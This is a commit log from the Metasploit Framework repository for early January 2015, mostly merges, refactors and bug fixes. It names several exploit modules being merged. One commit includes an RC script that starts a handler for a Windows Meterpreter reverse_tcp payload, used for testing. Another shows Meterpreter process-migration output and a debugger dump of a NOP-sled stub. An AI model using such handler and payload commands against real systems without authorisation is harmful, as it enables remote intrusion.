Meatballs
bdbb26ba31
Land #4540 , resolves #4532 , honour DB_ALL_* options
2015-01-07 21:12:23 +00:00
Meatballs
361057ce6e
Land #4544 , resolves #4511 - fix rails log location
2015-01-07 20:58:26 +00:00
Meatballs
db367895a8
Land #4491 , Fix test modules
2015-01-07 20:48:49 +00:00
Brent Cook
0c94536b87
make post service manipulation tests work
...
Fix a funny default service name, adjust test to be case-agnostic.
winmgmt on Windows XP and Windows 8 have different capitalization for this
service. I'm not sure why it's a module parameter though - the test will still
fail if its anything other than winmgmt.
The following RC script has 7 successful outputs when run against a reverse_tcp shell.
Run a reverse_tcp stager and the following RC script to run the test
```
loadpath test/modules
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.43.1
run -j
sleep 5
use post/test/services
set SESSION 1
run
```
Note: this test still doesn't run very reliably on windows 8 unless you're
using the code from rapid7/meterpreter#107 and #4411 , though it runs ok on
Windows XP.
2015-01-07 13:31:16 -06:00
Brent Cook
c96c8a03cf
CmdStagerVBS is now in Rex::Exploitation
...
```
$ ./msfconsole -qx "loadpath test/modules/; exit"
Loaded 32 modules:
12 auxiliarys
12 exploits
8 posts
```
2015-01-07 13:31:15 -06:00
David Maloney
9bcb3b95cd
Merge branch 'master' of github.com:rapid7/metasploit-framework
2015-01-07 12:41:43 -06:00
David Maloney
5d68d48ca5
Land #4385 , fixes bruteforce_speed validator
...
bruteforce_speed validator now accepts nil
2015-01-07 12:09:25 -06:00
David Maloney
702511dbc5
respect DB_ALL_USERS & DB_ALL_PASS
...
fix last few things in authbrute
and make the CredentialCollections understand the
additional seperate components
MSP-11986
2015-01-07 11:41:41 -06:00
David Maloney
7ff2ba0725
first pass on fixing DB_ALL authbrute stuff
...
DB_ALL_CREDS worked but DB_ALL_USER and DB_ALL_PASS
did not. working on fixing that.
This commit also does some nice DRY work in the auth_brute mixin
MSP-11986
2015-01-07 11:30:39 -06:00
James Lee
3e80efb5a8
Land #4521 , Pandora FMS upload
2015-01-07 11:13:57 -06:00
James Lee
1ccef7dc3c
Shorter timeout so we get shell sooner
...
The request to execute our payload will never return, so waiting for the
default timeout (20 seconds) is pointless.
2015-01-07 11:11:33 -06:00
James Lee
efe83a4f31
Whitespace
2015-01-07 10:19:17 -06:00
Trevor Rosen
3ba3465afb
Ensure logging in ~/.msf4/log
...
Fix #4511
2015-01-07 09:37:07 -06:00
rcnunez
b3def856fd
Applied changes recommended by jlee-r7
...
used Rex::ConnectionError
refactor begin/rescue blocks
removed ::URI::InvalidURIError
changed @peer with peer
used Exploit::CheckCode:Appears instead of Exploit::CheckCode::Vulnerable
2015-01-07 18:38:19 +08:00
William Vu
fee49b0b85
Land #4531 , Msf::Exploit::PDF method name fix
2015-01-06 14:26:58 -06:00
sinn3r
609c490b3c
I missed nobfu
2015-01-06 12:49:39 -06:00
sinn3r
2ed05869b8
Make Msf::Exploit::PDF follow the Ruby method naming convention
...
Just changing method names.
It will actually also fix #4520
2015-01-06 12:42:06 -06:00
William Vu
0bece137c1
Land #4494 , Object.class.to_s fix
2015-01-06 02:27:35 -06:00
William Vu
f2710f6ba7
Land #4443 , BulletProof FTP client exploit
2015-01-06 02:10:42 -06:00
William Vu
482cfb8d59
Clean up some stuff
2015-01-06 02:10:25 -06:00
William Vu
46aa165ca5
Land #4481 , enum_users_history improvements
2015-01-06 01:52:38 -06:00
William Vu
745bfb2f35
Clean things up
2015-01-06 01:48:18 -06:00
Brent Cook
a69609fe04
Land #4523 : wchen-r7's #inspect->to_s conversions
...
Keep custom object display behavior the same between Ruby 1.9 and 2.1.
2015-01-05 13:26:08 -06:00
Brent Cook
e73ff61f42
Land #4512 , OJ's removal of superfluous path expansion
2015-01-05 13:14:59 -06:00
sinn3r
44dfa746eb
Resolve #4513 - Change #inspect to #to_s
...
Resolve #4513
2015-01-05 11:50:51 -06:00
sinn3r
4257fef91b
Land #4101 - Konica MFP FTP and SMB credential gathering module
2015-01-05 10:31:28 -06:00
rcnunez
547b7f2752
Syntax and File Upload BugFix
...
Fix unexpected ) in line 118
Fix file cleanup missing _
Fix more robust version check script
Fix file upload
2015-01-05 19:23:22 +08:00
William Vu
1f4d62aff3
Land #4514 , invalid splat URL fix
2015-01-05 03:44:40 -06:00
jvazquez-r7
e7affb9048
Land #4493 , @pedrib's module for ManageEngine Central Desktop create admin
2015-01-04 23:46:31 -06:00
jvazquez-r7
c5e72fb324
Change module filename
2015-01-04 23:14:12 -06:00
jvazquez-r7
4798f2328d
Change module filename
2015-01-04 23:13:17 -06:00
jvazquez-r7
6bb3171328
Do minor cleanup
2015-01-04 23:12:42 -06:00
jvazquez-r7
711b97ecc5
Beautify metadata
2015-01-04 23:08:46 -06:00
jvazquez-r7
4653e48dba
Land #4515 , @bcook-r7's linux meterpreter binaries update
2015-01-04 16:59:24 -06:00
Brent Cook
7ae56865f1
Update linux meterpreter binaries for rapid7/meterpreter#111
...
This rebuilds the binaries on Ubuntu 10.04 i386 for metepreter PR #111 ,
improving the reliability and fixing some bugs in linux process migration.
Tested against Ubuntu 10.04 i386 and Ubuntu 14.04 x86_64:
```
meterpreter > ps
...
55994 48270 server 0 bcook ../metasploit-framework/server
56009 44199 bash 0 bcook -bash
56094 56009 dummy 0 bcook ./dummy
meterpreter > migrate 56094
[*] Migrating to 56094
[*] Migration completed successfully.
meterpreter > sysinfo
Computer : mint
OS : Linux mint 3.13.0-37-generic #64-Ubuntu SMP Mon Sep 22 21:28:38 UTC 2014 (x86_64)
Architecture : x86_64
Meterpreter : x86/linux
meterpreter > ps
...
55994 48270 [server] <defunct> 0 bcook
56009 44199 bash 0 bcook -bash
56094 56009 dummy 0 bcook ./dummy
meterpreter >
```
Verified presence of call stub when debugging a session:
```
(gdb) x/32b 0x61cc28
0x61cc28: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x61cc30: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x61cc38: 0x90 0x90 0x68 0x04 0x00 0x00 0x00 0x68
0x61cc40: 0xff 0xff 0xff 0xff 0xb8 0x5a 0x5a 0x5a
```
2015-01-04 10:47:44 -06:00
Pedro Ribeiro
32d4bf03c3
Add OSVDB id and full disclosure URL
2015-01-04 12:36:51 +00:00
Joshua J. Drake
7295cd34aa
One more http// fix
2015-01-03 02:32:08 -06:00
William Vu
327f2839bb
Land #4508 , default Ruby 2.1.5 for everyone
2015-01-02 17:15:53 -06:00
OJ
17ff546b0f
Remove unnecessary calls to expand path
...
When using the Meterpreter Binaries gem to locate the path to the
meterpreter DLLs, it's not necessary to use File.expand_path on
the result because the gem's code does this already.
This commit simple removes those unnecessary calls.
2015-01-03 08:30:26 +10:00
Tod Beardsley
ff43fbd8de
Land #4509 , private/protected workaround for 2.1.5
...
Fixes #4507 . See also #4506 (but does not fix this yet).
2015-01-02 15:53:58 -06:00
sinn3r
d45cdd61aa
Resolve #4507 - respond_to? + send = evil
...
Since Ruby 2.1, the respond_to? method is more strict because it does
not check protected methods. So when you use send(), clearly you're
ignoring this type of access control. The patch is meant to preserve
this behavior to avoid potential breakage.
Resolve #4507
2015-01-02 13:29:17 -06:00
Tod Beardsley
a6e23e5e4d
Default Ruby 2.1.5 for everyone
...
See #4506
2015-01-02 11:33:36 -06:00
OJ
5596cee803
Land #4502 - Update linux meterpreter bins
2015-01-02 12:41:35 +10:00
jvazquez-r7
69bda63ef6
Update linux meterpreter binaries
2015-01-01 20:05:36 -06:00
William Vu
b64bfd87ca
Land #4501 , Wordpress readme regex update
2015-01-01 18:03:15 -06:00
Christian Mehlmauer
056046f38b
update wordpress readme regex
2015-01-01 23:13:20 +01:00
Tod Beardsley
c1718fa490
Land #4440 , git client exploit from @jhart-r7
...
Also fixes #4435 and makes progress against #4445 .
2015-01-01 13:18:43 -06:00
Tod Beardsley
d7564f47cc
Move Mercurial option to advanced, update ref url
...
See #4440
2015-01-01 13:08:36 -06:00
Tod Beardsley
914c724abe
Rename module
...
See rapid7#4440
2015-01-01 13:03:17 -06:00
William Vu
2d6571c735
Land #4497 , end-of-year .mailmap refresh
2015-01-01 09:10:59 -06:00